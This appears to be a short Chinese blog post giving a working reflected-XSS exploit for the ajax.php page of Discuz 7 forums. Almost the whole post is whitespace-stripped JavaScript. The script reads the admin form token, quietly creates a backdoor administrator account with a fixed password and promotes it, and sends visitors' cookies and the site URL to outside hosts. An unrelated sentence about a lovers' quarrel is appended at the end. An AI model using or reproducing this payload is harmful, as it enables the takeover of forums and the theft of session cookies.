此反射型XSS在ajax.php中,exploit如下:
vartype="Discuz7";varusername_add="blackcushion020";vargetHost=function(url){varhost="null";if(typeofurl=="undefined"||null==url)url=window.location.href;varregex=/(.*)ajax.php\?(.*)/;varmatch=url.match(regex);if(typeofmatch!="undefined"&&null!=match)host=match[1];returnhost;}functiongetURL(s){varimage=newImage();image.style.width=0;image.style.height=0;image.src=s;}varsiteurl=getHost();alert(siteurl);varrequest=false;if(window.XMLHttpRequest){request=newXMLHttpRequest();if(request.overrideMimeType){request.overrideMimeType('text/xml');}}elseif(window.ActiveXObject){varversions=['Microsoft.XMLHTTP','MSXML.XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP'];for(vari=0;i<versions.length;i++){try{request=newActiveXObject(versions);}catch(e){}}}xmlhttp=request;xmlhttp.open("GET",siteurl+"admincp.php?action=members&operation=add",false);xmlhttp.send(null);varecho=xmlhttp.responseText;varreg=/name=\&;formhash\&;value=\&;([\w\d]+)\&;/i;vararr=reg.exec(echo);if(!arr){alert(document.cookie);getURL("http://12.yifi8.cn/mail/phpwriter.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));}window.onerror=function(){returntrue;}varformhash=arr[1];alert(formhash);varpost="formhash="+formhash+"&anchor=&newusername="+username_add+"&newpassword=123456ab&newemail=dd23d2d7d%40126.com&newgroupid=10&emailnotify=0&addsubmit=%CC%E1%BD%BB";xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=add",false);xmlhttp.setRequestHeader("Referer",siteurl);xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");xmlhttp.setRequestHeader("content-length",post.length);xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");xmlhttp.send(post);alert("aaaaaaa");varecho2=xmlhttp.responseText;//varreg2=/blackcushion013\(UID([\w\d]+)\)/i;//varreg2=/用户(.*)添加成功/;varreg2=/blackcushion020\(UID([\d]+)\)/i;vararr2=reg2.exec(echo2);varsid2=arr2[1];varpost2="formhash="+formhash+"&anchor=&groupidnew=1&adminidnew%5B0%5D=0&expirydatenew=&expgroupidnew=1&expadminidnew=1&editsubmit=%CC%E1%BD%BB";xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=group&uid="+sid2,false);xmlhttp.setRequestHeader("Referer",siteurl);xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");xmlhttp.setRequestHeader("content-length",post.length);xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");xmlhttp.send(post2);getURL("http://baidu.cn/mail/phpmail.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));
标签分类: 渗透技巧 脚本渗透
为了一些琐事吵架,然后冷战,疯狂思念对方,最后和好。
